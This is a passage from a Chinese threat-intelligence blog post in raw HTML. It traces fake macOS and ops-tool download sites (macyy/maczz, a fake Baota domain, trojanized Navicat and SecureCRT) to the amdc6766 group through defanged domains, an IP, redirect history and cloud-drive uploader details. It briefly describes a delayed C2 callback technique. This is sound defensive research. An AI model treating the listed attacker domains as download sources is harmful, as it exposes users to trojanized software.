4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">redi.nyazz[.]com</span></code><span leaf=""> 是个假冒 rdm 的站，现在解析到刚才出现过的 118.107.29.172。</span></p><p><img data-imgfileid="100001508" class="rich_pages wxw-img" data-ratio="0.6554276315789473" data-s="300,640" data-type="png" data-w="2432" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=3f63fa7e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9xCqAgjwXQbLKWIxAhz5FEP0MuiaJpIUTpdu7oSYJOHY9YRlwpLgymAA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">往下翻发现关联到 macyy 之后感觉域名有点眼熟，翻了一下果然，去年就打过交道。</span></p><p><img data-imgfileid="100001506" class="rich_pages wxw-img" data-ratio="0.1764069264069264" data-s="300,640" data-type="png" data-w="1848" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=6bc03194&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9OFojkZ8mGgfWDWOjMhHQ0woI5icyXJ5MIJhyjNsv54VAicYtP7XrHuCg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">搜了下聊天记录，发现当时也给朋友分享过。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">如果当时没搞混的话， </span><strong style="color: rgb(0, 0, 0);font-weight: bold;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">macyy[.]cn</span></code><span leaf=""> 跟刚才假冒宝塔域名的主域名 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">yingxunszcm[.]cn</span></code><span leaf=""> 应该也可以关联起来</span></strong><span leaf="">。</span></p><p><img data-imgfileid="100001509" class="rich_pages wxw-img" data-ratio="0.6908734052993131" data-s="300,640" data-type="png" data-w="2038" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=5e0299b4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9dtiaLVsPMyX51IyY8icjMMShpoZ1YxDhZtDaMFADFme8ibfwpdolxFlOw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">记得当时是有个员工下载了假冒的 navicat 被抓到了，C2地址跟奇安信《</span><a href="https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247505958&amp;idx=1&amp;sn=682ba53276766d52120febe88ff3344e&amp;scene=21#wechat_redirect" style="color: rgb(30, 107, 184);font-weight: bold;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;text-decoration-color: currentcolor;text-decoration: none;text-decoration-style: solid;text-decoration-thickness: auto;overflow-wrap: break-word;" href="https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247505958&amp;idx=1&amp;sn=682ba53276766d52120febe88ff3344e&amp;scene=21#wechat_redirect"><span leaf="">黑客组织木马化Navicat等多个工具针对运维网管人员的攻击活动分析</span></a><span leaf="">》文章中的 amdc6766 相匹配。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">由于之前看到文章中写</span><strong style="color: rgb(0, 0, 0);font-weight: bold;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;"><span leaf="">攻击者改动主程序之后加料再重新签名</span></strong><span leaf="">，</span><strong style="color: rgb(0, 0, 0);font-weight: bold;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;"><span leaf="">C2的回连机制是在用户真正连接数据库的时候才触发</span></strong><span leaf="">，当时觉得这个操作很秀，感觉比主流的银狐手段要稍高一个level，所以印象很深刻。</span></p><p><img data-imgfileid="100001511" class="rich_pages wxw-img" data-ratio="0.4388092613009923" data-s="300,640" data-type="png" data-w="1814" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=8d3083d6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9D7k5bEWKk2piazrDZFPicdveRPQgYadb5N0c9niaiaXVbRuGmMic8kChdrw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001512" class="rich_pages wxw-img" data-ratio="0.42066805845511485" data-s="300,640" data-type="png" data-w="1916" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=f2be4f5a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9NMAa1jmYvfMJlokjerYREjYzrvPKZTGuO4icaVLpPrsicdu1VNTqGx8Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">还能搜到群友讨论。</span></p><p><img data-imgfileid="100001510" class="rich_pages wxw-img" data-ratio="0.38197424892703863" data-s="300,640" data-type="png" data-w="1398" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=a2b65359&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY94sXaoExe3O98JVn8ibQGh1hYia8SJ5VoQ7aBxTCr5tVvCCicrrJ66BoyA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">历史解析的域名中还有一个命中了奇安信文章中另外一个模仿 xshell 官网域名的 ioc 。</span></p><p><img data-imgfileid="100001513" class="rich_pages wxw-img" data-ratio="0.13541666666666666" data-s="300,640" data-type="png" data-w="1536" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=ef34662a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9icbqIrUDm7A6LbqBz6nzg4yaaiaQ1GyXFPSJVc7u30UAjd21ZSDvrs2w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001514" class="rich_pages wxw-img" data-ratio="0.48498845265588914" data-s="300,640" data-type="png" data-w="1732" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=32514605&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9PsKLtdlZXzxiaic5erYwDuOgJa3ouoNmictgaRb4BRTghNhEjnYSGfib1g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="font-size: 18px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">重新分析 macyy</span></span><span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">当时 macyy 发生投毒事件，&#34;安全绘景&#34; 公众号曾经写过一篇《</span><a href="https://mp.weixin.qq.com/s?__biz=MzkyNzYxMDQ2MQ==&amp;mid=2247484326&amp;idx=1&amp;sn=b9d0c249799e91fed844e5165e1eedbe&amp;scene=21#wechat_redirect" style="color: rgb(30, 107, 184);font-weight: bold;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;text-decoration-color: currentcolor;text-decoration: none;text-decoration-style: solid;text-decoration-thickness: auto;overflow-wrap: break-word;" href="https://mp.weixin.qq.com/s?__biz=MzkyNzYxMDQ2MQ==&amp;mid=2247484326&amp;idx=1&amp;sn=b9d0c249799e91fed844e5165e1eedbe&amp;scene=21#wechat_redirect"><span leaf="">关于某.cn的MAC应用软件网站隐藏着MacOS后门</span></a><span leaf="">》文章来说这件事。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">后来安天发过《</span><a href="https://mp.weixin.qq.com/s?__biz=MjM5MTA3Nzk4MQ==&amp;mid=2650203645&amp;idx=1&amp;sn=f9e3f71df39785a5d510173bea884f81&amp;scene=21#wechat_redirect" style="color: rgb(30, 107, 184);font-weight: bold;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;text-decoration-color: currentcolor;text-decoration: none;text-decoration-style: solid;text-decoration-thickness: auto;overflow-wrap: break-word;" href="https://mp.weixin.qq.com/s?__biz=MjM5MTA3Nzk4MQ==&amp;mid=2650203645&amp;idx=1&amp;sn=f9e3f71df39785a5d510173bea884f81&amp;scene=21#wechat_redirect"><span leaf="">“暗蚊”黑产团伙通过国内下载站传播Mac远控木马攻击活动分析</span></a><span leaf="">》、深信服发过《</span><a href="https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247521920&amp;idx=1&amp;sn=8e09a13e41334d61ff3c73f3bd169f0e&amp;scene=21#wechat_redirect" style="color: rgb(30, 107, 184);font-weight: bold;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;text-decoration-color: currentcolor;text-decoration: none;text-decoration-style: solid;text-decoration-thickness: auto;overflow-wrap: break-word;" href="https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247521920&amp;idx=1&amp;sn=8e09a13e41334d61ff3c73f3bd169f0e&amp;scene=21#wechat_redirect"><span leaf="">【高级持续威胁(APT)】谁是“amdc6766”：一年四起供应链投毒事件的幕后黑手</span></a><span leaf="">》，讲的都是这件事。</span></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">Macyy -&gt; Maczz</span></span><span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">现在直接访问 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">macyy[.]cn</span></code><span leaf=""> 会跳转到 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">maczz[.]net</span></code><span leaf="">，看到老哥为了适配 yy 俩字母弄了个 “元婴” 软件站有点绷不住了😂。</span></p><p><img data-imgfileid="100001516" class="rich_pages wxw-img" data-ratio="0.5560538116591929" data-s="300,640" data-type="png" data-w="3122" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=5237061a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9hJ4ZEJjeTs9kKSOefWbxtEwNrupuCFdtp9KyPA4SpQZW0dG4bdkf9Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">回溯了一下，24年3月份开始301跳转到 maczz。</span></p><p><img data-imgfileid="100001515" class="rich_pages wxw-img" data-ratio="0.44788273615635177" data-s="300,640" data-type="png" data-w="2456" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=f447bbce&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9bwyX2b6iclRc3EQBADUwxC6B93ZpqfNqHcUAQAp6nj6s6pSliaEf8BlA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">maczz.net 的第一次快照时间在 24年2月份</span></p><p><img data-imgfileid="100001522" class="rich_pages wxw-img" data-ratio="0.5738423028785983" data-s="300,640" data-type="png" data-w="3196" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=0812bede&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9VoRemdMVxXib5HXtxDfq20OFZKoUuuZ86QTqaF8exicn6JvNb2AbkeSA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">之后似乎一直没有太大的变化，一直到今年的9月份上架Termius</span></p><p><img data-imgfileid="100001517" class="rich_pages wxw-img" data-ratio="0.289025221540559" data-s="300,640" data-type="png" data-w="2934" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=bf9c6f62&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9iaEbMfySrHsPBm6RywvFIvibribRpjVwib3J5leyDPF5PYXlVj9IeqN2Hg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">手机号和文件时间</span></span><span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">当时 &#34;安全绘景&#34; 的公众号在说假冒的 SecureCRT 安装包的时候，有这么一张图。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">123 云盘的上传者手机号是 13xxx9，文件上传时间 2023/12/15。</span></p><p><img data-imgfileid="100001518" class="rich_pages wxw-img" data-ratio="0.4520367936925099" data-s="300,640" data-type="png" data-w="1522" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=763851f4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9PDzt4KGh08EyCma5GgWQCQlZvwDnU4qDx5N6q1iaH61FoFicZv79ppvw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">我点开目前排在第一个的 Termius 客户端的 123 网盘地址，发现 dmg 包的时间更新了，但是哥们似乎没换 123 盘绑定的手机号（当然也不排除这个网盘账号是伴随着 macyy 是一直被出售转手的一部分内容的可能）。</span></p><p><img data-imgfileid="100001519" class="rich_pages wxw-img" data-ratio="0.2713248638838475" data-s="300,640" data-type="png" data-w="2204" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=632d696d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9dUuicqMMkLA1TorzqA6TdsqM4Zw9HicTUfEath8yTaEdPAQllOC2WFmQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">简单抽查了几个，发现除了极个别的大文件不是 “13xxx9” 的123网盘账号以外，其他的基本上都是这个账号。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">另外这个 010Editor 的上传时间是 2023/12/16，时间跟之前爆毒的 SecureCRT 非常接近。</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100001520" data-ratio="0.27503628447024675" data-s="300,640" type="block" data-type="png" data-w="2756" src="https://wechat2rss.xlab.app/img-proxy/?k=dd96f974&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9ickY6yBmiaQDN4bKHdLPP2oRbFLojyM1RBlWGLAcK3OteF9yoCO4zdhg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这个有可能是太大了，上传成本比较高，直接用的别人传的。</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100001521" data-ratio="0.2746844840386043" data-s="300,640" type="block" data-type="png" data-w="2694" 